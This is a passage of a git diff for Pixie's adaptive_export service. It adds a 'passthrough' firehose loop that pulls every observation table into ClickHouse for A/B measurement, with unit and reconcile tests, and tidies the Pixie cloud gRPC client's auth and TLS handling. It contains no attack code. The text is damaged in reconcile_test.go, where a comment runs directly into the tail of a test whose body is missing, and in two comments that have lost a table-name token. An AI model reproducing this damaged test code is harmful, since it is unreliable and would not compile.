http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package passthrough is the firehose-mode counterpart to the anomaly-gated +// adaptive write path. When enabled, a single background loop queries every +// pixie observation table with an empty Target (no ns/pod predicate), +// covering the configured rolling window, and writes the result via the +// existing sink. The intent is one-shot A/B measurement: compare the +// row-count + on-disk byte volume of forensic_db tables under ADAPTIVE_PASSTHROUGH=1 +// (Phase EVERYTHING) vs ADAPTIVE_PASSTHROUGH=0 (Phase AE-FILTER) under the +// same load + window, yielding the AE capture fraction per table. +// +// This package is intentionally minimal: no anomaly gate, no ActiveSet, no +// trigger. It reuses the same QueryFor / Adapter / Sink wiring as the rest +// of AE so the bytes-per-row shape is comparable across phases. +package passthrough + +import ( + "context" + "sync" + "time" + + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile" +) + +// excludedTables are dropped from the firehose table set: tables that are +// declared builtin but are not materialised on every cluster, so a +// passthrough pull against them returns a "Table not found" compilation +// error every tick (pure log spam, zero rows). http2_messages.beta is the +// known offender. Removing it here keeps the schema/DDL lists (which still +// own the table when it DOES exist) untouched. +var excludedTables = map[string]bool{ + "http2_messages.beta": true, +} + +// querier matches the cmd-side pixieAdapter wrapper (returns +// []map[string]any instead of pixieapi.Row) so the loop is decoupled +// from pxapi internals + trivially fakeable in tests. +type querier interface { + Query(ctx context.Context, src string) ([]map[string]any, error) +} + +// sink writes rows for a specific pixie table to forensic_db.
. +type sink interface { + WritePixieRows(ctx context.Context, table string, rows []map[string]any) error +} + +// Config carries the env-derived knobs. Window: the rolling lookback the +// loop's PxL covers each refresh. Refresh: cadence between loop iterations. +// Tables: which pixie tables to firehose (defaults to clickhouse.PixieTables() +// when nil/empty). +type Config struct { + Window time.Duration + Refresh time.Duration + Tables []string + // Rec records per-pull read/wrote counts (ADAPTIVE_RECONCILE). nil → + // defaulted to reconcile.Nop{} in New (instrument off). + Rec reconcile.Recorder + // Hostname is the node name stamped on reconcile rows. + Hostname string + // Compiled selects the firehose query path. When true (the default + // wired by cmd/main.go), per-table PxL is precompiled ONCE at New and + // all tables are pulled CONCURRENTLY per tick. When false, the legacy + // path is used: QueryFor rebuilds each table's PxL every tick and the + // tables are walked serially. The env var ADAPTIVE_PASSTHROUGH_COMPILED + // (cmd/main.go) flips this — set it to "false" to revert. + Compiled bool +} + +// Loop is the passthrough goroutine. +type Loop struct { + q querier + s sink + cfg Config + // tmpl holds the precompiled per-table PxL templates (table → fmt + // template with two %d time-bound verbs). Populated in New only when + // cfg.Compiled; nil otherwise. + tmpl map[string]string +} + +// New constructs a Loop. Caller-provided querier+sink must already be +// wired (cmd/main.go builds both unconditionally when ADAPTIVE_PASSTHROUGH +// is enabled). +func New(q querier, s sink, cfg Config) *Loop { + if cfg.Window <= 0 { + cfg.Window = 30 * time.Second + } + if cfg.Refresh <= 0 { + cfg.Refresh = 30 * time.Second + } + if len(cfg.Tables) == 0 { + cfg.Tables = clickhouse.PixieTables() + } + // Drop tables that aren't materialised on this cluster (e.g. + // http2_messages.beta) so they don't error every tick. + cfg.Tables = filterExcluded(cfg.Tables) + if cfg.Rec == nil { + cfg.Rec = reconcile.Nop{} + } + l := &Loop{q: q, s: s, cfg: cfg} + if cfg.Compiled { + // Precompile each table's PxL once. The window is fixed for the + // lifetime of the loop, so only the per-tick time bounds vary. + l.tmpl = make(map[string]string, len(cfg.Tables)) + for _, table := range cfg.Tables { + t, err := pxl.CompilePassthrough(table, cfg.Window) + if err != nil { + // A non-builtin table can't be compiled; skip it rather + // than fail construction (matches the per-table tolerance + // of the run loop). + log.WithError(err).WithField("table", table). + Warn("ADAPTIVE_PASSTHROUGH: precompile skipped") + continue + } + l.tmpl[table] = t + } + } + return l +} + +// filterExcluded returns tables with the excludedTables entries removed, +// preserving order. +func filterExcluded(tables []string) []string { + out := tables[:0:0] + for _, t := range tables { + if excludedTables[t] { + continue + } + out = append(out, t) + } + return out +} + +// rec emits one passthrough reconciliation row (best-effort; Nop when the +// instrument is off). +func (l *Loop) rec(ctx context.Context, table string, winStart, winEnd time.Time, read, wrote int, errStr string) { + l.cfg.Rec.Record(ctx, reconcile.Row{ + TS: time.Now(), + Mode: "passthrough", + Table: table, + WinStart: winStart, + WinEnd: winEnd, + ReadCount: int64(read), + WroteCount: int64(wrote), + WriteErr: errStr, + Hostname: l.cfg.Hostname, + }) +} + +// Run blocks until ctx is cancelled. On each refresh tick the loop walks +// the configured tables, queries pixie for the window [now-Window, now) +// with no ns/pod filter, and writes the resulting rows. Individual table +// failures are logged but never break the loop — passthrough is a +// best-effort measurement workload, not the durable write path. +func (l *Loop) Run(ctx context.Context) { + log.WithFields(log.Fields{ + "window": l.cfg.Window, + "refresh": l.cfg.Refresh, + "tables": l.cfg.Tables, + }).Info("ADAPTIVE_PASSTHROUGH: firehose loop starting") + + // Fire immediately so the first window doesn't have to wait `Refresh`. + l.tick(ctx) + + t := time.NewTicker(l.cfg.Refresh) + defer t.Stop() + for { + select { + case <-ctx.Done(): + log.Info("ADAPTIVE_PASSTHROUGH: firehose loop stopped") + return + case <-t.C: + l.tick(ctx) + } + } +} + +// tick runs one passthrough sweep across every configured table. When +// cfg.Compiled (the default) all tables are pulled CONCURRENTLY using the +// precompiled templates; otherwise they are walked serially with QueryFor +// rebuilt per tick (legacy path, kept for rollback via the env var). +func (l *Loop) tick(ctx context.Context) { + now := time.Now() + sliceStart := now.Add(-l.cfg.Window) + sliceEnd := now + + if l.cfg.Compiled { + l.tickConcurrent(ctx, sliceStart, sliceEnd) + return + } + for _, table := range l.cfg.Tables { + if ctx.Err() != nil { + return + } + // Empty Target: namespace+pod predicates are SKIPPED inside + // QueryFor, so the PxL DataFrame returns ALL rows in the window. + // This is the bypass that makes the A/B measurement meaningful. + src, err := pxl.QueryFor(table, anomaly.Target{}, sliceStart, sliceEnd, now) + if err != nil { + log.WithError(err).WithField("table", table).Warn("ADAPTIVE_PASSTHROUGH: QueryFor failed") + l.rec(ctx, table, sliceStart, sliceEnd, 0, 0, err.Error()) + continue + } + l.pull(ctx, table, src, sliceStart, sliceEnd) + } +} + +// tickConcurrent fires every table's precompiled query at once and waits +// for all to finish. Per-table failures are isolated inside pull, so one +// table's error never affects another. +func (l *Loop) tickConcurrent(ctx context.Context, sliceStart, sliceEnd time.Time) { + var wg sync.WaitGroup + for _, table := range l.cfg.Tables { + if ctx.Err() != nil { + break + } + tmpl, ok := l.tmpl[table] + if !ok { + // Non-builtin table skipped at precompile time. + continue + } + src := pxl.Render(tmpl, sliceStart, sliceEnd) + wg.Add(1) + go func(table, src string) { + defer wg.Done() + l.pull(ctx, table, src, sliceStart, sliceEnd) + }(table, src) + } + wg.Wait() +} + +// pull runs one table's query, writes the rows, and records the reconcile +// row. It is safe for concurrent use across distinct tables: the querier, +// sink, and recorder are all pool/HTTP-backed and concurrency-safe, and +// each call touches a different forensic_db.
. +func (l *Loop) pull(ctx context.Context, table, src string, sliceStart, sliceEnd time.Time) { + // Bound this table's external query+write+record so a hung dependency can't + // stall the whole sweep or delay shutdown (CodeRabbit). Derived per-table + // from the parent ctx; covers both the serial and concurrent tick paths. + ctx, cancel := context.WithTimeout(ctx, l.cfg.Refresh) + defer cancel() + rows, err := l.q.Query(ctx, src) + if err != nil { + log.WithError(err).WithField("table", table).Warn("ADAPTIVE_PASSTHROUGH: pixie query failed") + l.rec(ctx, table, sliceStart, sliceEnd, 0, 0, err.Error()) + return + } + if len(rows) == 0 { + log.WithField("table", table).Debug("ADAPTIVE_PASSTHROUGH: 0 rows") + l.rec(ctx, table, sliceStart, sliceEnd, 0, 0, "") + return + } + if err := l.s.WritePixieRows(ctx, table, rows); err != nil { + log.WithError(err).WithFields(log.Fields{ + "table": table, + "rows": len(rows), + }).Warn("ADAPTIVE_PASSTHROUGH: sink write failed") + l.rec(ctx, table, sliceStart, sliceEnd, len(rows), 0, err.Error()) + return + } + log.WithFields(log.Fields{ + "table": table, + "rows": len(rows), + }).Info("ADAPTIVE_PASSTHROUGH: rows written") + l.rec(ctx, table, sliceStart, sliceEnd, len(rows), len(rows), "") +} diff --git a/src/vizier/services/adaptive_export/internal/passthrough/passthrough_test.go b/src/vizier/services/adaptive_export/internal/passthrough/passthrough_test.go new file mode 100644 index 00000000000..e1653da02a8 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/passthrough/passthrough_test.go @@ -0,0 +1,230 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package passthrough + +import ( + "context" + "errors" + "strings" + "sync" + "sync/atomic" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" +) + +type fakeQuerier struct { + mu sync.Mutex + calls []string // PxL sources received + row map[string]any + err error +} + +func (f *fakeQuerier) Query(_ context.Context, src string) ([]map[string]any, error) { + f.mu.Lock() + f.calls = append(f.calls, src) + f.mu.Unlock() + if f.err != nil { + return nil, f.err + } + return []map[string]any{f.row}, nil +} + +type fakeSink struct { + mu sync.Mutex + writes map[string]int // table → row count + failFor string +} + +func newFakeSink() *fakeSink { return &fakeSink{writes: map[string]int{}} } + +func (f *fakeSink) WritePixieRows(_ context.Context, table string, rows []map[string]any) error { + f.mu.Lock() + defer f.mu.Unlock() + if f.failFor == table { + return errors.New("fakeSink: forced failure") + } + f.writes[table] += len(rows) + return nil +} + +// TestLoop_DefaultsTablesToPixieTables — when Config.Tables is unset, the +// loop must walk every clickhouse.PixieTables() entry MINUS the passthrough +// exclusions (see excludedTables in passthrough.go — tables that aren't +// materialised on every cluster). This is the contract the A/B measurement +// depends on (a missing table silently drops a column from the capture- +// fraction matrix). +func TestLoop_DefaultsTablesToPixieTables(t *testing.T) { + q := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}} + s := newFakeSink() + l := New(q, s, Config{Window: 1 * time.Second, Refresh: 1 * time.Hour}) + + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + l.tick(ctx) + + expected := filterExcluded(clickhouse.PixieTables()) + if len(s.writes) != len(expected) { + t.Fatalf("wrote %d tables, want %d", len(s.writes), len(expected)) + } + for _, want := range expected { + if s.writes[want] != 1 { + t.Fatalf("table %q: wrote %d rows, want 1", want, s.writes[want]) + } + } + // And the excluded tables must NOT have been written. + for excl := range excludedTables { + if got, ok := s.writes[excl]; ok { + t.Fatalf("excluded table %q was written %d times — exclusion list out of sync with passthrough.New", excl, got) + } + } +} + +// TestLoop_EmitsEmptyTargetPxL — the firehose semantics require the PxL +// to omit the namespace/pod predicates entirely. The whole A/B +// experiment is meaningful only if the EVERYTHING phase truly does NOT +// filter rows. +func TestLoop_EmitsEmptyTargetPxL(t *testing.T) { + q := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}} + s := newFakeSink() + l := New(q, s, Config{Window: 1 * time.Second, Refresh: 1 * time.Hour}) + + l.tick(context.Background()) + + for _, src := range q.calls { + // pxl.QueryFor with empty Target writes neither "df.namespace ==" nor + // "df.pod ==" predicates. If either appears, the loop is silently + // filtering and the A/B comparison is invalid. + if strings.Contains(src, "df.namespace ==") { + t.Fatalf("passthrough PxL contains namespace filter — A/B invariant broken:\n%s", src) + } + if strings.Contains(src, "df.pod ==") { + t.Fatalf("passthrough PxL contains pod filter — A/B invariant broken:\n%s", src) + } + } +} + +// TestLoop_TickContinuesPastTableFailure — a single table failing +// (query error OR sink error) must not block subsequent tables in the +// same tick. Otherwise a transient pixie 500 on http_events would +// silently drop conn_stats, redis_events, etc. from that window. +func TestLoop_TickContinuesPastTableFailure(t *testing.T) { + q := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}} + s := newFakeSink() + s.failFor = "http_events" // sink rejects the first table + l := New(q, s, Config{ + Window: 1 * time.Second, + Refresh: 1 * time.Hour, + Tables: []string{"http_events", "conn_stats", "dns_events"}, + }) + + l.tick(context.Background()) + + if s.writes["http_events"] != 0 { + t.Fatalf("http_events should NOT have written: %d rows", s.writes["http_events"]) + } + if s.writes["conn_stats"] != 1 || s.writes["dns_events"] != 1 { + t.Fatalf("tables after the failure should still write: conn_stats=%d dns_events=%d", + s.writes["conn_stats"], s.writes["dns_events"]) + } +} + +// TestLoop_RunFiresImmediately — the first tick must happen on Run +// entry (not after one Refresh). Otherwise a 30s default Refresh would +// add 30s of "AE-FILTER" baseline mixing into the EVERYTHING phase's +// first window when the operator boots into passthrough mode. +func TestLoop_RunFiresImmediately(t *testing.T) { + q := &fakeQuerier{row: map[string]any{"upid": "x", "time_": time.Now()}} + s := newFakeSink() + l := New(q, s, Config{ + Window: 1 * time.Second, + Refresh: 1 * time.Hour, // ensure the test fails if we wait for the ticker + Tables: []string{"http_events"}, + }) + + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + + done := make(chan struct{}) + go func() { l.Run(ctx); close(done) }() + + // Poll briefly — Run's immediate tick should land within ms. + deadline := time.After(2 * time.Second) + for { + s.mu.Lock() + got := s.writes["http_events"] + s.mu.Unlock() + if got == 1 { + break + } + select { + case <-deadline: + t.Fatalf("first tick did not fire within 2s; got %d writes", got) + case <-time.After(10 * time.Millisecond): + } + } + cancel() + <-done +} + +// TestNew_AppliesDefaults — Window/Refresh = 0 fall back to 30s, Tables +// = nil falls back to clickhouse.PixieTables() with excludedTables +// stripped (see passthrough.go for the rationale). Production cmd/main.go +// reads optional env knobs into Config; an unset env yields a zero +// duration and we must not crash with a zero ticker. +func TestNew_AppliesDefaults(t *testing.T) { + l := New(&fakeQuerier{}, newFakeSink(), Config{}) + if l.cfg.Window != 30*time.Second { + t.Fatalf("default Window = %v, want 30s", l.cfg.Window) + } + if l.cfg.Refresh != 30*time.Second { + t.Fatalf("default Refresh = %v, want 30s", l.cfg.Refresh) + } + if got, want := len(l.cfg.Tables), len(filterExcluded(clickhouse.PixieTables())); got != want { + t.Fatalf("default Tables count = %d, want %d", got, want) + } +} + +// TestLoop_RespectsContext — a cancelled context mid-tick should stop +// further table queries (we don't want a 2-min stall on SIGTERM when +// the loop has 13 tables × N-second pixie roundtrip queued up). +func TestLoop_RespectsContext(t *testing.T) { + var calls atomic.Int32 + q := &slowQuerier{calls: &calls} + s := newFakeSink() + l := New(q, s, Config{ + Window: 1 * time.Second, + Refresh: 1 * time.Hour, + Tables: []string{"a", "b", "c", "d", "e"}, + }) + + ctx, cancel := context.WithCancel(context.Background()) + cancel() // cancel before tick starts + l.tick(ctx) + // All tables should be skipped because ctx.Err() != nil at top of loop. + if calls.Load() != 0 { + t.Fatalf("expected 0 querier calls after cancel, got %d", calls.Load()) + } +} + +type slowQuerier struct{ calls *atomic.Int32 } + +func (s *slowQuerier) Query(_ context.Context, _ string) ([]map[string]any, error) { + s.calls.Add(1) + return nil, nil +} diff --git a/src/vizier/services/adaptive_export/internal/passthrough/reconcile_test.go b/src/vizier/services/adaptive_export/internal/passthrough/reconcile_test.go new file mode 100644 index 00000000000..44a546e82b9 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/passthrough/reconcile_test.go @@ -0,0 +1,247 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package passthrough + +import ( + "context" + "errors" + "net/http" + "net/http/httptest" + "strings" + "sync/atomic" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile" + sinkpkg "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" +) + +// capRec captures every reconcile.Row for assertions. +type capRec struct{ rows []reconcile.Row } + +func (c *capRec) Record(_ context.Context, r reconcile.Row) { c.rows = append(c.rows, r) } + +// tableQuerier returns a fixed row count per pixie table, keyed by the +// `table='X'` token QueryFor embeds in the PxL. An entry of -1 means the +// query itself fails (to exercise the read-error branch). +type tableQuerier struct{ n map[string]int } + +func (q tableQuerier) Query(_ context.Context, src string) ([]map[string]any, error) { + for tbl, n := range q.n { + if strings.Contains(src, "table='"+tbl+"'") { + if n < 0 { + return nil, errors.New("boom") + } + rows := make([]map[string]any, n) + for i := range rows { + rows[i] = map[string]any{"time_": int64(i)} + } + return rows, nil + } + } + return nil, nil +} + +// failSink fails WritePixieRows for tables in `fail`, succeeds otherwise. +type failSink struct{ fail map[string]bool } + +func (s failSink) WritePixieRows(_ context.Context, table string, _ []map[string]any) error { + if s.fail[table] { + return errors.New("sink down") + } + return nil +} + +// TestTick_ReconcileRecordsReadVsWrote is the scientific check of the +// passthrough write-fidelity instrument: for every table pulled in a tick, +// exactly one reconcile.Row must be emitted, and its (ReadCount, WroteCount) +// must reflect the actual read/write outcome — the basis for localizing +// loss to query (readwrote — the exact shape a sink-drop bug + // produces, which a count-only check would miss. + if r := got["conn_stats"]; r[0] <= r[1] { + t.Errorf("conn_stats read(%d) must exceed wrote(%d) on sink failure", r[0], r[1]) + } +} + +// TestNew_DefaultsRecorderToNop proves the instrument is OFF (no panic on a +// nil Recorder) unless explicitly wired. +func TestNew_DefaultsRecorderToNop(t *testing.T) { + loop := New(tableQuerier{n: map[string]int{"http_events": 1}}, failSink{}, + Config{Window: time.Second, Tables: []string{"http_events"}}) + // Must not panic with Rec unset. + loop.tick(context.Background()) +} + +// TestTick_ReconcileCatchesCHSilentDrop — the production-meaningful +// counterpart to TestTick_ReconcileRecordsReadVsWrote: replaces the +// in-process fake sink with a real sink.ClickHouseHTTP pointed at an +// httptest server that mimics CH's X-ClickHouse-Summary silent-drop +// shape (200 OK + written_rows=0 in the header). The loop must see +// the silent drop as an error (sink.summaryWroteFewerThan returns +// non-nil) and record WroteCount=0, ReadCount=N. This is the EXACT +// regression an R6 (sink-layer loss) reconcile run must detect; the +// fake-sink test only proves the wiring, this test proves the chain +// works end-to-end. +func TestTick_ReconcileCatchesCHSilentDrop(t *testing.T) { + const ( + table = "http_events" + nRows = 5 + ) + // Counter so we can assert the loop actually called the sink once + // (one tick × one table = one POST). + var posts atomic.Int32 + ch := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + posts.Add(1) + // Emulate CH's silent-drop response: 200 OK with summary that + // says "0 rows written" despite a non-empty body. AE's sink + // turns this into a Go error via summaryWroteFewerThan. + w.Header().Set("X-ClickHouse-Summary", `{"written_rows":"0"}`) + w.WriteHeader(http.StatusOK) + })) + defer ch.Close() + + s, err := sinkpkg.New(sinkpkg.Config{Endpoint: ch.URL, Database: "forensic_db"}) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + rec := &capRec{} + loop := New( + tableQuerier{n: map[string]int{table: nRows}}, + s, + Config{ + Window: 60 * time.Second, + Tables: []string{table}, + Rec: rec, + Hostname: "node-test", + }, + ) + loop.tick(context.Background()) + + if posts.Load() != 1 { + t.Fatalf("CH endpoint hit %d times, want 1", posts.Load()) + } + if len(rec.rows) != 1 { + t.Fatalf("recorded %d reconcile rows, want 1", len(rec.rows)) + } + row := rec.rows[0] + if row.Table != table { + t.Fatalf("Table=%q want %q", row.Table, table) + } + if row.ReadCount != int64(nRows) { + t.Fatalf("ReadCount=%d, want %d (read from querier)", row.ReadCount, nRows) + } + if row.WroteCount != 0 { + t.Fatalf("WroteCount=%d, want 0 (CH silent-drop must land here, not at %d)", row.WroteCount, nRows) + } + if !strings.Contains(row.WriteErr, "silent drop") && !strings.Contains(row.WriteErr, "written_rows") { + t.Fatalf("WriteErr=%q, want CH silent-drop attribution", row.WriteErr) + } +} + +// TestTick_ReconcileAttributesCHFailureCorrectly — the dual to +// CHSilentDrop: when CH returns an actual 5xx, the loop must record +// the same (read=N, wrote=0) shape with a different WriteErr. Proves +// the loop's read-count vs wrote-count split is sink-error-agnostic +// (it's the COUNT that matters for R6 attribution, not the specific +// failure mode). +func TestTick_ReconcileAttributesCHFailureCorrectly(t *testing.T) { + const ( + table = "dns_events" + nRows = 7 + ) + ch := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) { + w.WriteHeader(http.StatusInternalServerError) + _, _ = w.Write([]byte("Memory limit exceeded")) + })) + defer ch.Close() + + s, err := sinkpkg.New(sinkpkg.Config{Endpoint: ch.URL, Database: "forensic_db"}) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + rec := &capRec{} + loop := New( + tableQuerier{n: map[string]int{table: nRows}}, + s, + Config{ + Window: 60 * time.Second, + Tables: []string{table}, + Rec: rec, + Hostname: "node-test", + }, + ) + loop.tick(context.Background()) + + if len(rec.rows) != 1 { + t.Fatalf("recorded %d reconcile rows, want 1", len(rec.rows)) + } + row := rec.rows[0] + if row.ReadCount != int64(nRows) || row.WroteCount != 0 { + t.Fatalf("got (read,wrote)=(%d,%d) want (%d,0)", row.ReadCount, row.WroteCount, nRows) + } + if !strings.Contains(row.WriteErr, "500") && !strings.Contains(row.WriteErr, "Memory") { + t.Fatalf("WriteErr=%q, want 500/Memory attribution", row.WriteErr) + } +} diff --git a/src/vizier/services/adaptive_export/internal/pixie/pixie.go b/src/vizier/services/adaptive_export/internal/pixie/pixie.go index feb8cadd698..e62c2a323d1 100644 --- a/src/vizier/services/adaptive_export/internal/pixie/pixie.go +++ b/src/vizier/services/adaptive_export/internal/pixie/pixie.go @@ -14,12 +14,18 @@ // // SPDX-License-Identifier: Apache-2.0 +// Package pixie is a thin gRPC wrapper around Pixie cloud's +// PluginService — used by adaptive_export at boot only, to ensure the +// ClickHouse retention plugin is enabled. Retention scripts themselves +// (the PxL that Pixie runs to populate forensic_db.) are +// user-defined via the Pixie UI; this package does NOT manage them. package pixie import ( "context" "crypto/tls" "fmt" + "net" "strings" "github.com/gogo/protobuf/types" @@ -38,6 +44,7 @@ const ( exportURLConfig = "exportURL" ) +// Client wraps a gRPC connection to Pixie cloud's PluginService. type Client struct { cloudAddr string ctx context.Context @@ -46,43 +53,72 @@ type Client struct { pluginClient cloudpb.PluginServiceClient } +// NewClient dials the Pixie cloud and authenticates with apiKey via +// the per-call metadata header. +// +// Auth choice — why API key here, not a service JWT. +// Two different gRPC perimeters are talked to from AE: +// 1. This package (pixie.Client) targets the Pixie CLOUD (cloudpb's +// PluginService): enabling the ClickHouse retention plugin, syncing +// preset retention scripts. The cloud's auth interceptor accepts the +// `pixie-api-key` header for external clients and resolves it to an +// org. JWT service tokens minted with PL_JWT_SIGNING_KEY are only +// trusted by INSIDE-cluster vizier services (kelvin, metadata, +// query_broker); cloud rejects them. See +// src/cloud/api/controllers/auth_grpc.go:62 for the cloud-side +// "pixie-api-key" handler and src/api/go/pxapi/client.go:117 for +// pixie's own SDK using the same header. +// 2. pixieapi.Adapter (internal/pixieapi) targets vizier DIRECTLY +// (vizierpb.VizierService at query-broker / PEM direct-query) and +// correctly uses JWT via jwtutils.GenerateJWTForService — the same +// pattern as cloud_connector/vizhealth/checker.go:111 and +// query_broker/script_runner/script_runner.go:248. +// +// So: this NewClient must take an API key; flipping it to JWT would +// break cloud auth, not improve it. func NewClient(ctx context.Context, apiKey string, cloudAddr string) (*Client, error) { if apiKey == "" { - fmt.Println("WARNING: API key is empty!") + return nil, fmt.Errorf("pixie: empty API key") } - c := &Client{ cloudAddr: cloudAddr, ctx: metadata.AppendToOutgoingContext(ctx, "pixie-api-key", apiKey), } - if err := c.init(); err != nil { return nil, err } - return c, nil } func (c *Client) init() error { - isInternal := strings.ContainsAny(c.cloudAddr, "cluster.local") - - tlsConfig := &tls.Config{InsecureSkipVerify: isInternal} + host := c.cloudAddr + if h, _, err := net.SplitHostPort(c.cloudAddr); err == nil { + host = h + } + isInternal := host == "cluster.local" || strings.HasSuffix(host, ".cluster.local") + tlsConfig := &tls.Config{ + InsecureSkipVerify: isInternal, //nolint:gosec // in-cluster vizier traffic only + MinVersion: tls.VersionTLS12, + } creds := credentials.NewTLS(tlsConfig) - conn, err := grpc.Dial(c.cloudAddr, grpc.WithTransportCredentials(creds)) if err != nil { return err } - c.grpcConn = conn c.pluginClient = cloudpb.NewPluginServiceClient(conn) return nil } +// ClickHousePluginConfig is the minimal config the ensure-on path needs. +type ClickHousePluginConfig struct { + ExportURL string +} + +// GetClickHousePlugin returns the ClickHouse retention plugin descriptor, +// or an error if it is not registered with the cloud. func (c *Client) GetClickHousePlugin() (*cloudpb.Plugin, error) { - req := &cloudpb.GetPluginsRequest{ - Kind: cloudpb.PK_RETENTION, - } + req := &cloudpb.GetPluginsRequest{Kind: cloudpb.PK_RETENTION} resp, err := c.pluginClient.GetPlugins(c.ctx, req) if err != nil { return nil, err @@ -92,44 +128,35 @@ func (c *Client) GetClickHousePlugin() (*cloudpb.Plugin, error) { return plugin, nil } } - return nil, fmt.Errorf("the %s plugin could not be found", clickhousePluginID) -} - -type ClickHousePluginConfig struct { - ExportURL string + return nil, fmt.Errorf("pixie: %s plugin not found", clickhousePluginID) } +// GetClickHousePluginConfig returns the current org-level config (the +// ExportURL the retention plugin is currently writing to), falling back +// to the plugin's default if no custom URL is set. func (c *Client) GetClickHousePluginConfig() (*ClickHousePluginConfig, error) { - req := &cloudpb.GetOrgRetentionPluginConfigRequest{ - PluginId: clickhousePluginID, - } + req := &cloudpb.GetOrgRetentionPluginConfigRequest{PluginId: clickhousePluginID} resp, err := c.pluginClient.GetOrgRetentionPluginConfig(c.ctx, req) if err != nil { return nil, err } exportURL := resp.CustomExportUrl if exportURL == "" { - exportURL, err = c.getDefaultClickHouseExportURL() + info, err := c.pluginClient.GetRetentionPluginInfo(c.ctx, + &cloudpb.GetRetentionPluginInfoRequest{PluginId: clickhousePluginID}) if err != nil { return nil, err } + exportURL = info.DefaultExportURL } - return &ClickHousePluginConfig{ - ExportURL: exportURL, - }, nil -} - -func (c *Client) getDefaultClickHouseExportURL() (string, error) { - req := &cloudpb.GetRetentionPluginInfoRequest{ - PluginId: clickhousePluginID, - } - info, err := c.pluginClient.GetRetentionPluginInfo(c.ctx, req) - if err != nil { - return "", err - } - return info.DefaultExportURL, nil + return &ClickHousePluginConfig{ExportURL: exportURL}, nil } +// EnableClickHousePlugin turns the plugin on with the supplied +// ExportURL. Idempotent on the cloud side: calling Enable when already +// enabled re-applies the same config without effect. DisablePresets is +// true so existing user-defined retention scripts (the source of truth +// for what gets written) are not overwritten by Pixie's preset set. func (c *Client) EnableClickHousePlugin(config *ClickHousePluginConfig, version string) error { req := &cloudpb.UpdateRetentionPluginConfigRequest{ PluginId: clickhousePluginID, @@ -146,36 +173,12 @@ func (c *Client) EnableClickHousePlugin(config *ClickHousePluginConfig, version return err } -// DisableClickHousePlugin flips the retention plugin off without touching scripts. -// Scripts are expected to be removed separately via DeleteDataRetentionScript. -func (c *Client) DisableClickHousePlugin(version string) error { - req := &cloudpb.UpdateRetentionPluginConfigRequest{ - PluginId: clickhousePluginID, - Enabled: &types.BoolValue{Value: false}, - Version: &types.StringValue{Value: version}, - } - _, err := c.pluginClient.UpdateRetentionPluginConfig(c.ctx, req) - return err -} - -func (c *Client) GetPresetScripts() ([]*script.ScriptDefinition, error) { - resp, err := c.pluginClient.GetRetentionScripts(c.ctx, &cloudpb.GetRetentionScriptsRequest{}) - if err != nil { - return nil, err - } - var l []*script.ScriptDefinition - for _, s := range resp.Scripts { - if s.PluginId == clickhousePluginID && s.IsPreset { - sd, err := c.getScriptDefinition(s) - if err != nil { - return nil, err - } - l = append(l, sd) - } - } - return l, nil -} - +// GetClusterScripts returns the retention scripts CURRENTLY installed on +// clusterID. Caller diffs against GetPresetScripts to figure out what +// to add / update / delete. Filters the cloud-returned ALL-clusters +// script list to those that actually target the caller's clusterID — +// without that filter, the diff later treats other clusters' scripts +// as "stale on this cluster" and tries to delete them. func (c *Client) GetClusterScripts(clusterID, clusterName string) ([]*script.Script, error) { resp, err := c.pluginClient.GetRetentionScripts(c.ctx, &cloudpb.GetRetentionScriptsRequest{}) if err != nil { @@ -184,31 +187,33 @@ func (c *Client) GetClusterScripts(clusterID, clusterName string) ([]*script.Scr var l []*script.Script for _, s := range resp.Scripts { if s.PluginId == clickhousePluginID { + clusterIDs := make([]string, 0, len(s.ClusterIDs)) + // Empty clusterID = no filter (legacy callers; rare). + match := clusterID == "" + for _, id := range s.ClusterIDs { + idStr := utils.ProtoToUUIDStr(id) + clusterIDs = append(clusterIDs, idStr) + if idStr == clusterID { + match = true + } + } + if !match { + continue + } sd, err := c.getScriptDefinition(s) if err != nil { return nil, err } l = append(l, &script.Script{ ScriptDefinition: *sd, - ScriptId: utils.ProtoToUUIDStr(s.ScriptID), - ClusterIds: getClusterIDsAsString(s.ClusterIDs), + ScriptID: utils.ProtoToUUIDStr(s.ScriptID), + ClusterIds: strings.Join(clusterIDs, ","), }) } } return l, nil } -func 